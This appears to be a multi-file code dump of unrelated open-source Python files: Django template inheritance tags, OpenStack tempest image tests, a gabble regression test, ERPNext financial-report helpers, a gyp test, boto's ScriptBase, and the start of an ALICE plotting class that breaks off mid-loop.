        # Blocks from more-derived templates are queued ahead of base ones.
        for name, block in six.iteritems(blocks):
            self.blocks[name].insert(0, block)
    def pop(self, name):
        queue = self.blocks[name]
        if not queue:
            return None
        return queue.pop()
    def push(self, name, block):
        self.blocks[name].append(block)
    def get_block(self, name):
        queue = self.blocks[name]
        if not queue:
            return None
        return queue[-1]
class BlockNode(Node):
    """Renders a {% block %}; cooperates with BlockContext when the template
    is part of an {% extends %} chain."""
    def __init__(self, name, nodelist, parent=None):
        self.name, self.nodelist, self.parent = name, nodelist, parent
    def __repr__(self):
        return "<Block Node: %s. Contents: %r>" % (self.name, self.nodelist)
    def render(self, context):
        block_context = context.render_context.get(BLOCK_CONTEXT_KEY)
        with context.push():
            if block_context is None:
                # Not inside an extends chain: render our own nodelist.
                context['block'] = self
                result = self.nodelist.render(context)
            else:
                # Use the most-derived override of this block, if any.
                push = block = block_context.pop(self.name)
                if block is None:
                    block = self
                # Create new block so we can store context without thread-safety issues.
                block = type(self)(block.name, block.nodelist)
                block.context = context
                context['block'] = block
                result = block.nodelist.render(context)
                if push is not None:
                    # Restore the popped block so sibling renders still see it.
                    block_context.push(self.name, push)
        return result
    def super(self):
        """Render the parent template's version of this block ({{ block.super }})."""
        if not hasattr(self, 'context'):
            raise TemplateSyntaxError(
                "'%s' object has no attribute 'context'. Did you use "
                "{{ block.super }} in a base template?" % self.__class__.__name__
            )
        render_context = self.context.render_context
        if (BLOCK_CONTEXT_KEY in render_context and
                render_context[BLOCK_CONTEXT_KEY].get_block(self.name) is not None):
            return mark_safe(self.render(self.context))
        return ''
class ExtendsNode(Node):
    """Implements {% extends %}: pushes this template's blocks into the shared
    BlockContext and then renders the parent template."""
    must_be_first = True
    def __init__(self, nodelist, parent_name, template_dirs=None):
        self.nodelist = nodelist
        self.parent_name = parent_name
        self.template_dirs = template_dirs
        # Map of block name -> BlockNode defined directly in this template.
        self.blocks = {n.name: n for n in nodelist.get_nodes_by_type(BlockNode)}
    def __repr__(self):
        return '<ExtendsNode: extends %s>' % self.parent_name.token
    def get_parent(self, context):
        """Resolve parent_name and return it as a django.template.Template."""
        parent = self.parent_name.resolve(context)
        if not parent:
            error_msg = "Invalid template name in 'extends' tag: %r." % parent
            if self.parent_name.filters or\
                    isinstance(self.parent_name.var, Variable):
                error_msg += " Got this from the '%s' variable." %\
                    self.parent_name.token
            raise TemplateSyntaxError(error_msg)
        if isinstance(parent, Template):
            # parent is a django.template.Template
            return parent
        if isinstance(getattr(parent, 'template', None), Template):
            # parent is a django.template.backends.django.Template
            return parent.template
        return context.template.engine.get_template(parent)
    def render(self, context):
        compiled_parent = self.get_parent(context)
        if BLOCK_CONTEXT_KEY not in context.render_context:
            context.render_context[BLOCK_CONTEXT_KEY] = BlockContext()
        block_context = context.render_context[BLOCK_CONTEXT_KEY]
        # Add the block nodes from this node to the block context
        block_context.add_blocks(self.blocks)
        # If this block's parent doesn't have an extends node it is the root,
        # and its block nodes also need to be added to the block context.
        for node in compiled_parent.nodelist:
            # The ExtendsNode has to be the first non-text node.
            if not isinstance(node, TextNode):
                if not isinstance(node, ExtendsNode):
                    blocks = {n.name: n for n in
                              compiled_parent.nodelist.get_nodes_by_type(BlockNode)}
                    block_context.add_blocks(blocks)
                break
        # Call Template._render explicitly so the parser context stays
        # the same.
        return compiled_parent._render(context)
class IncludeNode(Node):
    """Implements {% include %}: renders another template inline, optionally
    with extra context ('with') or a fully isolated context ('only')."""
    def __init__(self, template, *args, **kwargs):
        self.template = template
        self.extra_context = kwargs.pop('extra_context', {})
        self.isolated_context = kwargs.pop('isolated_context', False)
        super(IncludeNode, self).__init__(*args, **kwargs)
    def render(self, context):
        # Accepts either a template name or an object that already renders.
        try:
            template = self.template.resolve(context)
            # Does this quack like a Template?
            if not callable(getattr(template, 'render', None)):
                # If not, we'll try get_template
                template = context.template.engine.get_template(template)
            values = {
                name: var.resolve(context)
                for name, var in six.iteritems(self.extra_context)
            }
            if self.isolated_context:
                return template.render(context.new(values))
            with context.push(**values):
                return template.render(context)
        except Exception:
            # Includes fail silently unless template debugging is enabled.
            if context.template.engine.debug:
                raise
            return ''
@register.tag('block')
def do_block(parser, token):
    """
    Define a block that can be overridden by child templates.
    """
    # token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
    bits = token.contents.split()
    if len(bits) != 2:
        raise TemplateSyntaxError("'%s' tag takes only one argument" % bits[0])
    block_name = bits[1]
    # Keep track of the names of BlockNodes found in this template, so we can
    # check for duplication.
    # NOTE: no name mangling applies here (module-level function), so the
    # literal attribute name '__loaded_blocks' is stored on the parser.
    try:
        if block_name in parser.__loaded_blocks:
            raise TemplateSyntaxError("'%s' tag with name '%s' appears more than once" % (bits[0], block_name))
        parser.__loaded_blocks.append(block_name)
    except AttributeError:  # parser.__loaded_blocks isn't a list yet
        parser.__loaded_blocks = [block_name]
    nodelist = parser.parse(('endblock',))
    # This check is kept for backwards-compatibility. See #3100.
    endblock = parser.next_token()
    acceptable_endblocks = ('endblock', 'endblock %s' % block_name)
    if endblock.contents not in acceptable_endblocks:
        parser.invalid_block_tag(endblock, 'endblock', acceptable_endblocks)
    return BlockNode(block_name, nodelist)
@register.tag('extends')
def do_extends(parser, token):
    """
    Signal that this template extends a parent template.
    This tag may be used in two ways: ``{% extends "base" %}`` (with quotes)
    uses the literal value "base" as the name of the parent template to extend,
    or ``{% extends variable %}`` uses the value of ``variable`` as either the
    name of the parent template to extend (if it evaluates to a string) or as
    the parent template itself (if it evaluates to a Template object).
    """
    pieces = token.split_contents()
    if len(pieces) != 2:
        raise TemplateSyntaxError("'%s' takes one argument" % pieces[0])
    parent = parser.compile_filter(pieces[1])
    # Consume the remainder of the template; extends must be unique.
    body = parser.parse()
    if body.get_nodes_by_type(ExtendsNode):
        raise TemplateSyntaxError("'%s' cannot appear more than once in the same template" % pieces[0])
    return ExtendsNode(body, parent)
@register.tag('include')
def do_include(parser, token):
    """
    Loads a template and renders it with the current context. You can pass
    additional context using keyword arguments.
    Example::
        {% include "foo/some_include" %}
        {% include "foo/some_include" with bar="BAZZ!" baz="BING!" %}
    Use the ``only`` argument to exclude the current context when rendering
    the included template::
        {% include "foo/some_include" only %}
        {% include "foo/some_include" with bar="1" only %}
    """
    bits = token.split_contents()
    if len(bits) < 2:
        raise TemplateSyntaxError(
            "%r tag takes at least one argument: the name of the template to "
            "be included." % bits[0]
        )
    options = {}
    remaining_bits = bits[2:]
    # Parse the optional 'with ...' and 'only' arguments, each at most once.
    while remaining_bits:
        option = remaining_bits.pop(0)
        if option in options:
            raise TemplateSyntaxError('The %r option was specified more '
                                      'than once.' % option)
        if option == 'with':
            value = token_kwargs(remaining_bits, parser, support_legacy=False)
            if not value:
                raise TemplateSyntaxError('"with" in %r tag needs at least '
                                          'one keyword argument.' % bits[0])
        elif option == 'only':
            value = True
        else:
            raise TemplateSyntaxError('Unknown argument for %r tag: %r.' %
                                      (bits[0], option))
        options[option] = value
    isolated_context = options.get('only', False)
    namemap = options.get('with', {})
    return IncludeNode(parser.compile_filter(bits[1]), extra_context=namemap,
                       isolated_context=isolated_context)
|
bsd-3-clause
|
JioCloud/tempest
|
tempest/api/image/v2/test_images.py
|
6
|
10418
|
# Copyright 2013 OpenStack Foundation
# Copyright 2013 IBM Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from six import moves
from tempest_lib.common.utils import data_utils
from tempest_lib import decorators
from tempest.api.image import base
from tempest import test
class BasicOperationsImagesTest(base.BaseV2ImageTest):
    """
    Here we test the basic operations of images
    """
    @decorators.skip_because(bug="1452987")
    @test.attr(type='smoke')
    @test.idempotent_id('139b765e-7f3d-4b3d-8b37-3ca3876ee318')
    def test_register_upload_get_image_file(self):
        """
        Here we test these functionalities - Register image,
        upload the image file, get image and get image file api's
        """
        uuid = '00000000-1111-2222-3333-444455556666'
        image_name = data_utils.rand_name('image')
        body = self.create_image(name=image_name,
                                 container_format='bare',
                                 disk_format='raw',
                                 visibility='private',
                                 ramdisk_id=uuid)
        self.assertIn('id', body)
        image_id = body.get('id')
        self.assertIn('name', body)
        self.assertEqual(image_name, body['name'])
        self.assertIn('visibility', body)
        self.assertEqual('private', body['visibility'])
        self.assertIn('status', body)
        self.assertEqual('queued', body['status'])
        # Now try uploading an image file
        file_content = data_utils.random_bytes()
        image_file = moves.cStringIO(file_content)
        self.client.store_image_file(image_id, image_file)
        # Now try to get image details
        body = self.client.show_image(image_id)
        self.assertEqual(image_id, body['id'])
        self.assertEqual(image_name, body['name'])
        self.assertEqual(uuid, body['ramdisk_id'])
        self.assertIn('size', body)
        # NOTE(review): assumes data_utils.random_bytes() default size is
        # 1024 bytes — confirm against tempest_lib.
        self.assertEqual(1024, body.get('size'))
        # Now try get image file
        body = self.client.load_image_file(image_id)
        self.assertEqual(file_content, body.data)
    @test.attr(type='smoke')
    @test.idempotent_id('f848bb94-1c6e-45a4-8726-39e3a5b23535')
    def test_delete_image(self):
        # Deletes an image by image_id
        # Create image
        image_name = data_utils.rand_name('image')
        body = self.client.create_image(name=image_name,
                                        container_format='bare',
                                        disk_format='raw',
                                        visibility='private')
        image_id = body['id']
        # Delete Image
        self.client.delete_image(image_id)
        self.client.wait_for_resource_deletion(image_id)
        # Verifying deletion
        images = self.client.list_images()
        images_id = [item['id'] for item in images]
        self.assertNotIn(image_id, images_id)
    @decorators.skip_because(bug="1452987")
    @test.attr(type='smoke')
    @test.idempotent_id('f66891a7-a35c-41a8-b590-a065c2a1caa6')
    def test_update_image(self):
        # Updates an image by image_id
        # Create image
        image_name = data_utils.rand_name('image')
        body = self.client.create_image(name=image_name,
                                        container_format='bare',
                                        disk_format='iso',
                                        visibility='private')
        self.addCleanup(self.client.delete_image, body['id'])
        self.assertEqual('queued', body['status'])
        image_id = body['id']
        # Now try uploading an image file
        image_file = moves.cStringIO(data_utils.random_bytes())
        self.client.store_image_file(image_id, image_file)
        # Update Image
        new_image_name = data_utils.rand_name('new-image')
        body = self.client.update_image(image_id, [
            dict(replace='/name', value=new_image_name)])
        # Verifying updating
        body = self.client.show_image(image_id)
        self.assertEqual(image_id, body['id'])
        self.assertEqual(new_image_name, body['name'])
class ListImagesTest(base.BaseV2ImageTest):
    """
    Here we test the listing of image information
    """
    @classmethod
    def resource_setup(cls):
        super(ListImagesTest, cls).resource_setup()
        # We add a few images here to test the listing functionality of
        # the images API
        cls._create_standard_image('bare', 'raw')
        cls._create_standard_image('bare', 'raw')
        cls._create_standard_image('ami', 'raw')
        # Add some more for listing
        cls._create_standard_image('ami', 'ami')
        cls._create_standard_image('ari', 'ari')
        cls._create_standard_image('aki', 'aki')
    @classmethod
    def _create_standard_image(cls, container_format, disk_format):
        """
        Create a new standard image and return the ID of the newly-registered
        image. Note that the size of the new image is a random number between
        1024 and 4096
        """
        size = random.randint(1024, 4096)
        image_file = moves.cStringIO(data_utils.random_bytes(size))
        name = data_utils.rand_name('image')
        body = cls.create_image(name=name,
                                container_format=container_format,
                                disk_format=disk_format,
                                visibility='private')
        image_id = body['id']
        # NOTE(review): the upload is commented out, so images stay 'queued'
        # with no stored data — confirm before relying on size/status filters.
        # cls.client.store_image(image_id, data=image_file)
        return image_id
    def _list_by_param_value_and_assert(self, params):
        """
        Perform list action with given params and validates result.
        """
        images_list = self.client.list_images(params=params)
        # Validating params of fetched images
        for image in images_list:
            for key in params:
                msg = "Failed to list images by %s" % key
                self.assertEqual(params[key], image[key], msg)
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('1e341d7a-90a9-494c-b143-2cdf2aeb6aee')
    def test_index_no_params(self):
        # Simple test to see all fixture images returned
        images_list = self.client.list_images()
        image_list = map(lambda x: x['id'], images_list)
        for image in self.created_images:
            self.assertIn(image, image_list)
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('9959ca1d-1aa7-4b7a-a1ea-0fff0499b37e')
    def test_list_images_param_container_format(self):
        # Test to get all images with container_format='bare'
        params = {"container_format": "bare"}
        self._list_by_param_value_and_assert(params)
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('4a4735a7-f22f-49b6-b0d9-66e1ef7453eb')
    def test_list_images_param_disk_format(self):
        # Test to get all images with disk_format = raw
        params = {"disk_format": "raw"}
        self._list_by_param_value_and_assert(params)
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('7a95bb92-d99e-4b12-9718-7bc6ab73e6d2')
    def test_list_images_param_visibility(self):
        # Test to get all images with visibility = private
        params = {"visibility": "private"}
        self._list_by_param_value_and_assert(params)
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('cf1b9a48-8340-480e-af7b-fe7e17690876')
    def test_list_images_param_size(self):
        # Test to get all images by size
        image_id = self.created_images[1]
        # Get image metadata
        image = self.client.show_image(image_id)
        params = {"size": image['size']}
        self._list_by_param_value_and_assert(params)
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('4ad8c157-971a-4ba8-aa84-ed61154b1e7f')
    def test_list_images_param_min_max_size(self):
        # Test to get all images with size between 2000 to 3000
        image_id = self.created_images[1]
        # Get image metadata
        image = self.client.show_image(image_id)
        size = image['size']
        params = {"size_min": size - 500, "size_max": size + 500}
        images_list = self.client.list_images(params=params)
        image_size_list = map(lambda x: x['size'], images_list)
        for image_size in image_size_list:
            self.assertTrue(image_size >= params['size_min'] and
                            image_size <= params['size_max'],
                            "Failed to get images by size_min and size_max")
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('7fc9e369-0f58-4d05-9aa5-0969e2d59d15')
    def test_list_images_param_status(self):
        # Test to get all active images
        params = {"status": "active"}
        self._list_by_param_value_and_assert(params)
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('e914a891-3cc8-4b40-ad32-e0a39ffbddbb')
    def test_list_images_param_limit(self):
        # Test to get images by limit
        params = {"limit": 2}
        images_list = self.client.list_images(params=params)
        self.assertEqual(len(images_list), params['limit'],
                         "Failed to get images by limit")
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('622b925c-479f-4736-860d-adeaf13bc371')
    def test_get_image_schema(self):
        # Test to get image schema
        schema = "image"
        body = self.client.show_schema(schema)
        self.assertEqual("image", body['name'])
    @decorators.skip_because(bug="1452987")
    @test.idempotent_id('25c8d7b2-df21-460f-87ac-93130bcdc684')
    def test_get_images_schema(self):
        # Test to get images schema
        schema = "images"
        body = self.client.show_schema(schema)
        self.assertEqual("images", body['name'])
|
apache-2.0
|
mlundblad/telepathy-gabble
|
tests/twisted/vcard/disconnect-during-pep.py
|
2
|
1199
|
"""
Regression test for https://bugs.freedesktop.org/show_bug.cgi?id=31412
"""
import dbus
from servicetest import call_async, EventPattern, sync_dbus
from gabbletest import (exec_test, make_result_iq, acknowledge_iq,
disconnect_conn)
import constants as cs
def test(q, bus, conn, stream):
    """Regression body for fd.o #31412: disconnect while a PEP query is in flight."""
    event = q.expect('stream-iq', to=None, query_ns='vcard-temp',
        query_name='vCard')
    acknowledge_iq(stream, event.stanza)
    handle = conn.RequestHandles(cs.HT_CONTACT, ['[email protected]'])[0]
    call_async(q, conn.Aliasing, 'RequestAliases', [handle])
    # First, Gabble sends a PEP query
    event = q.expect('stream-iq', to='[email protected]', iq_type='get',
        query_ns='http://jabber.org/protocol/pubsub', query_name='pubsub')
    # We disconnect too soon to get a reply
    disconnect_conn(q, conn, stream)
    # fd.o #31412 was that while the request pipeline was shutting down,
    # it would give the PEP query an error; the aliasing code would
    # respond by falling back to vCard via the request pipeline, which
    # was no longer there, *crash*.
    # check that Gabble hasn't crashed
    sync_dbus(bus, q, conn)
# Run the scenario through the gabbletest harness when invoked directly.
if __name__ == '__main__':
    exec_test(test)
|
lgpl-2.1
|
indictranstech/fbd_erpnext
|
erpnext/accounts/report/financial_statements.py
|
1
|
7760
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, _dict
from frappe.utils import (flt, getdate, get_first_day, get_last_day,
add_months, add_days, formatdate)
def get_period_list(fiscal_year, periodicity, from_beginning=False):
    """Get a list of dict {"to_date": to_date, "key": key, "label": label}
    Periodicity can be (Yearly, Half-yearly, Quarterly, Monthly)"""
    fy_start_end_date = frappe.db.get_value("Fiscal Year", fiscal_year, ["year_start_date", "year_end_date"])
    if not fy_start_end_date:
        frappe.throw(_("Fiscal Year {0} not found.").format(fiscal_year))
    start_date = getdate(fy_start_end_date[0])
    end_date = getdate(fy_start_end_date[1])
    if periodicity == "Yearly":
        period_list = [_dict({"to_date": end_date, "key": fiscal_year, "label": fiscal_year})]
    else:
        months_to_add = {
            "Half-yearly": 6,
            "Quarterly": 3,
            "Monthly": 1
        }[periodicity]
        period_list = []
        # start with first day, so as to avoid year to_dates like 2-April if ever they occur
        to_date = get_first_day(start_date)
        # NOTE(review): xrange (and the int result of 12 / months_to_add) is
        # Python 2 only — confirm before running under Python 3.
        for i in xrange(12 / months_to_add):
            to_date = add_months(to_date, months_to_add)
            if to_date == get_first_day(to_date):
                # if to_date is the first day, get the last day of previous month
                to_date = add_days(to_date, -1)
            else:
                # to_date should be the last day of the new to_date's month
                to_date = get_last_day(to_date)
            if to_date <= end_date:
                # the normal case
                period_list.append(_dict({ "to_date": to_date }))
                # if it ends before a full year
                if to_date == end_date:
                    break
            else:
                # if a fiscal year ends before a 12 month period
                period_list.append(_dict({ "to_date": end_date }))
                break
    # common processing: derive key/label and attach fiscal-year boundaries
    for opts in period_list:
        key = opts["to_date"].strftime("%b_%Y").lower()
        label = formatdate(opts["to_date"], "MMM YYYY")
        opts.update({
            "key": key.replace(" ", "_").replace("-", "_"),
            "label": label,
            "year_start_date": start_date,
            "year_end_date": end_date
        })
        if from_beginning:
            # set start date as None for all fiscal periods, used in case of Balance Sheet
            opts["from_date"] = None
        else:
            opts["from_date"] = start_date
    return period_list
def get_data(company, root_type, balance_must_be, period_list, ignore_closing_entries=False):
    """Build the report rows for one account root type, or None if the
    company has no accounts of that type."""
    accounts = get_accounts(company, root_type)
    if not accounts:
        return None
    accounts, accounts_by_name = filter_accounts(accounts)
    # All GL entries for the whole account subtree, over the full report span.
    gl_by_account = get_gl_entries(
        company, period_list[0]["from_date"], period_list[-1]["to_date"],
        accounts[0].lft, accounts[0].rgt,
        ignore_closing_entries=ignore_closing_entries)
    calculate_values(accounts_by_name, gl_by_account, period_list)
    accumulate_values_into_parents(accounts, accounts_by_name, period_list)
    rows = prepare_data(accounts, balance_must_be, period_list)
    if rows:
        add_total_row(rows, balance_must_be, period_list)
    return rows
def calculate_values(accounts_by_name, gl_entries_by_account, period_list):
    """Fold GL entries into cumulative (debit - credit) balances per period,
    stored on each account row under the period's key."""
    for entries in gl_entries_by_account.values():
        for entry in entries:
            d = accounts_by_name.get(entry.account)
            if d is None:
                # GL rows can reference accounts dropped by filter_accounts'
                # depth limit; the original raised TypeError here.
                continue
            for period in period_list:
                # balances are cumulative: include every posting up to to_date
                if entry.posting_date <= period.to_date:
                    d[period.key] = d.get(period.key, 0.0) + flt(entry.debit) - flt(entry.credit)
def accumulate_values_into_parents(accounts, accounts_by_name, period_list):
    """accumulate children's values in parent accounts"""
    # accounts are ordered parents-first, so walking in reverse guarantees a
    # child is rolled up before its parent is itself rolled up.
    for account in reversed(accounts):
        parent_name = account.parent_account
        if not parent_name:
            continue
        parent = accounts_by_name[parent_name]
        for period in period_list:
            current = parent.get(period.key, 0.0)
            parent[period.key] = current + account.get(period.key, 0.0)
def prepare_data(accounts, balance_must_be, period_list):
    """Convert account rows into report dicts, skipping all-zero accounts."""
    out = []
    year_start_date = period_list[0]["year_start_date"].strftime("%Y-%m-%d")
    year_end_date = period_list[-1]["year_end_date"].strftime("%Y-%m-%d")
    for d in accounts:
        # add to output
        has_value = False
        row = {
            "account_name": d.account_name,
            "account": d.name,
            "parent_account": d.parent_account,
            "indent": flt(d.indent),
            "from_date": year_start_date,
            "to_date": year_end_date
        }
        for period in period_list:
            if d.get(period.key):
                # change sign based on Debit or Credit, since calculation is done using (debit - credit)
                d[period.key] *= (1 if balance_must_be=="Debit" else -1)
            row[period.key] = flt(d.get(period.key, 0.0), 3)
            if abs(row[period.key]) >= 0.005:
                # ignore zero values
                has_value = True
        if has_value:
            out.append(row)
    return out
def add_total_row(out, balance_must_be, period_list):
    """Append a grand-total row plus a blank spacer row to *out*, moving the
    root account's figures into the total row."""
    total_row = {
        "account_name": "'" + _("Total ({0})").format(balance_must_be) + "'",
        "account": None
    }
    for period in period_list:
        total_row[period.key] = out[0].get(period.key, 0.0)
        # the root row's own figures are blanked; they now live in the total
        out[0][period.key] = ""
    out.append(total_row)
    # blank row after Total
    out.append({})
def get_accounts(company, root_type):
    """Fetch all accounts of *root_type* for *company*, ordered by tree
    position (lft) so parents precede their children."""
    return frappe.db.sql("""select name, parent_account, lft, rgt, root_type, report_type, account_name from `tabAccount`
        where company=%s and root_type=%s order by lft""", (company, root_type), as_dict=True)
def filter_accounts(accounts, depth=10):
    """Order *accounts* depth-first (root accounts sorted first), tagging each
    with its tree level in ``indent`` and dropping anything deeper than
    *depth*. Also returns a name -> account map."""
    parent_children_map = {}
    accounts_by_name = {}
    for account in accounts:
        accounts_by_name[account.name] = account
        parent_children_map.setdefault(account.parent_account or None, []).append(account)
    filtered_accounts = []
    def add_to_list(parent, level):
        # guard clause replaces the original nested-if structure
        if level >= depth:
            return
        children = parent_children_map.get(parent) or []
        if parent is None:
            sort_root_accounts(children)
        for child in children:
            child.indent = level
            filtered_accounts.append(child)
            add_to_list(child.name, level + 1)
    add_to_list(None, 0)
    return filtered_accounts, accounts_by_name
def sort_root_accounts(roots):
    """Sort root accounts in place as Asset, Liability, Equity, Income, Expense.

    Balance Sheet roots come before Profit and Loss roots; within those,
    Asset < Liability < Equity and Income < Expense.
    """
    from functools import cmp_to_key

    def compare_roots(a, b):
        if a.report_type != b.report_type and a.report_type == "Balance Sheet":
            return -1
        if a.root_type != b.root_type and a.root_type == "Asset":
            return -1
        if a.root_type == "Liability" and b.root_type == "Equity":
            return -1
        if a.root_type == "Income" and b.root_type == "Expense":
            return -1
        return 1

    # list.sort(cmp_function) is Python-2-only syntax; cmp_to_key gives the
    # same ordering and works on both 2.7 and 3.x
    roots.sort(key=cmp_to_key(compare_roots))
def get_gl_entries(company, from_date, to_date, root_lft, root_rgt, ignore_closing_entries=False):
    """Returns a dict like { "account": [gl entries], ... }

    Entries are fetched for every account inside the nested-set interval
    [root_lft, root_rgt] with posting_date <= to_date; ``from_date`` (if
    given) bounds the range on the other side.
    """
    additional_conditions = []

    # if cost_center:
    #     additional_conditions.append("and cost_center = %(cost_center)s")

    if ignore_closing_entries:
        # "Period Closing Voucher" entries only move P&L balances at year
        # end and would distort the report
        additional_conditions.append("and ifnull(voucher_type, '')!='Period Closing Voucher'")

    if from_date:
        additional_conditions.append("and posting_date >= %(from_date)s")

    gl_entries = frappe.db.sql("""select posting_date, account, debit, credit, is_opening from `tabGL Entry`
        where company=%(company)s
        {additional_conditions}
        and posting_date <= %(to_date)s
        and account in (select name from `tabAccount`
            where lft >= %(lft)s and rgt <= %(rgt)s)
        order by account, posting_date""".format(additional_conditions="\n".join(additional_conditions)),
        {
            "company": company,
            "from_date": from_date,
            "to_date": to_date,
            "lft": root_lft,
            "rgt": root_rgt
        },
        as_dict=True)

    # group the flat result rows by account name
    gl_entries_by_account = {}
    for entry in gl_entries:
        gl_entries_by_account.setdefault(entry.account, []).append(entry)

    return gl_entries_by_account
def get_columns(period_list):
    """Build the report column definitions: one Account link column
    followed by one Currency column per period."""
    account_column = {
        "fieldname": "account",
        "label": _("Account"),
        "fieldtype": "Link",
        "options": "Account",
        "width": 300
    }
    period_columns = [{
        "fieldname": period.key,
        "label": period.label,
        "fieldtype": "Currency",
        "width": 150
    } for period in period_list]
    return [account_column] + period_columns
|
agpl-3.0
|
bmotlaghFLT/FLT_PhantomJS
|
src/breakpad/src/tools/gyp/test/generator-output/gyptest-copies.py
|
151
|
1694
|
#!/usr/bin/env python

# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""
Verifies file copies using an explicit build target of 'all'.
"""

import TestGyp

test = TestGyp.TestGyp()

# The source tree is made read-only while gyp runs to prove that
# --generator-output never writes into it.
test.writable(test.workpath('copies'), False)

test.run_gyp('copies.gyp',
             '--generator-output=' + test.workpath('gypfiles'),
             chdir='copies')

test.writable(test.workpath('copies'), True)

test.relocate('copies', 'relocate/copies')
test.relocate('gypfiles', 'relocate/gypfiles')

# Lock the sources down again, but leave the build/output directories
# writable so the build itself can create files there.
test.writable(test.workpath('relocate/copies'), False)

test.writable(test.workpath('relocate/copies/build'), True)
test.writable(test.workpath('relocate/copies/copies-out'), True)
test.writable(test.workpath('relocate/copies/subdir/build'), True)
test.writable(test.workpath('relocate/copies/subdir/copies-out'), True)

test.build('copies.gyp', test.ALL, chdir='relocate/gypfiles')

test.must_match(['relocate', 'copies', 'copies-out', 'file1'],
                "file1 contents\n")

# Each generator puts build products in a different directory layout.
if test.format == 'xcode':
    chdir = 'relocate/copies/build'
elif test.format == 'make':
    chdir = 'relocate/gypfiles/out'
else:
    chdir = 'relocate/gypfiles'
test.must_match([chdir, 'Default', 'copies-out', 'file2'], "file2 contents\n")

test.must_match(['relocate', 'copies', 'subdir', 'copies-out', 'file3'],
                "file3 contents\n")

if test.format == 'xcode':
    chdir = 'relocate/copies/subdir/build'
elif test.format == 'make':
    chdir = 'relocate/gypfiles/out'
else:
    chdir = 'relocate/gypfiles'
test.must_match([chdir, 'Default', 'copies-out', 'file4'], "file4 contents\n")

test.pass_test()
|
bsd-3-clause
|
Shouqun/node-gn
|
tools/depot_tools/third_party/boto/pyami/scriptbase.py
|
90
|
1422
|
import os
import sys
from boto.utils import ShellCommand, get_ts
import boto
import boto.utils
class ScriptBase:
    """Base class for boto pyami scripts.

    Reads the instance id from the boto config (optionally merging an extra
    config file) and provides small helpers for notification, filesystem
    setup and running shell commands.
    """

    def __init__(self, config_file=None):
        self.instance_id = boto.config.get('Instance', 'instance-id', 'default')
        self.name = self.__class__.__name__
        self.ts = get_ts()
        if config_file:
            boto.config.read(config_file)

    def notify(self, subject, body=''):
        """Send a notification via boto.utils.notify."""
        boto.utils.notify(subject, body)

    def mkdir(self, path):
        """Create *path* if it does not exist; log (do not raise) on failure."""
        if not os.path.isdir(path):
            try:
                os.mkdir(path)
            except OSError:
                # was a bare "except:", which also swallowed KeyboardInterrupt
                # and SystemExit; only filesystem errors should be logged here
                boto.log.error('Error creating directory: %s' % path)

    def umount(self, path):
        """Unmount *path* if it is currently a mount point."""
        if os.path.ismount(path):
            self.run('umount %s' % path)

    def run(self, command, notify=True, exit_on_error=False, cwd=None):
        """Run *command* in a shell and return its exit status.

        On failure: log the output, optionally send a notification, and
        optionally terminate the process.
        """
        self.last_command = ShellCommand(command, cwd=cwd)
        if self.last_command.status != 0:
            boto.log.error('Error running command: "%s". Output: "%s"' % (command, self.last_command.output))
            if notify:
                self.notify('Error encountered', \
                            'Error running the following command:\n\t%s\n\nCommand output:\n\t%s' % \
                            (command, self.last_command.output))
            if exit_on_error:
                sys.exit(-1)
        return self.last_command.status
|
mit
|
dlodato/AliPhysics
|
PWGJE/EMCALJetTasks/Tracks/analysis/Draw/DrawClusters.py
|
41
|
5445
|
#**************************************************************************
#* Copyright(c) 1998-2014, ALICE Experiment at CERN, All rights reserved. *
#* *
#* Author: The ALICE Off-line Project. *
#* Contributors are mentioned in the code where appropriate. *
#* *
#* Permission to use, copy, modify and distribute this software and its *
#* documentation strictly for non-commercial purposes is hereby granted *
#* without fee, provided that the above copyright notice appears in all *
#* copies and that both the copyright notice and this permission notice *
#* appear in the supporting documentation. The authors make no claims *
#* about the suitability of this software for any purpose. It is *
#* provided "as is" without express or implied warranty. *
#**************************************************************************
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.FileHandler import ResultDataBuilder
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.Graphics import FourPanelPlot,GraphicsObject,Style,Frame
from ROOT import kBlack,kBlue,kGreen,kRed,kOrange
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.Helper import MakeRatio,HistToGraph
class ClusterComparisonPlot(FourPanelPlot):
    """2x2 canvas comparing cluster energy spectra for different triggers.

    Rows: calibrated (top) vs. uncalibrated (bottom) clusters.
    Columns: raw spectra (left, log scale) vs. triggered/min-bias ratios (right).
    """

    def __init__(self, comparisonCalib, comparisonUncalib):
        FourPanelPlot.__init__(self)
        self.__comparisonCalib = comparisonCalib
        self.__comparisonUncalib = comparisonUncalib

    def Create(self):
        """Build the canvas and draw all four panels."""
        self._OpenCanvas("clusterComparison", "Comparison of the cluster energy spectrum for different triggers")
        spectrumFrame = Frame("specfram", 0., 100., 1e-10, 100)
        spectrumFrame.SetXtitle("E (GeV)")
        spectrumFrame.SetYtitle("1/N_{ev} 1/(#Delta E) dN/dE (1/(GeV/c)^{2})")
        ratioFrame = Frame("ratioframe", 0., 100., 0., 2000.)
        ratioFrame.SetXtitle("E (GeV)")
        ratioFrame.SetYtitle("Triggered / Min. Bias")
        frames = [spectrumFrame, ratioFrame]
        comparisonObjects = [self.__comparisonCalib, self.__comparisonUncalib]
        modes = ["Calibrated clusters", "UncalibratedClusters"]
        for row in range(0, 2):
            for col in range(0, 2):
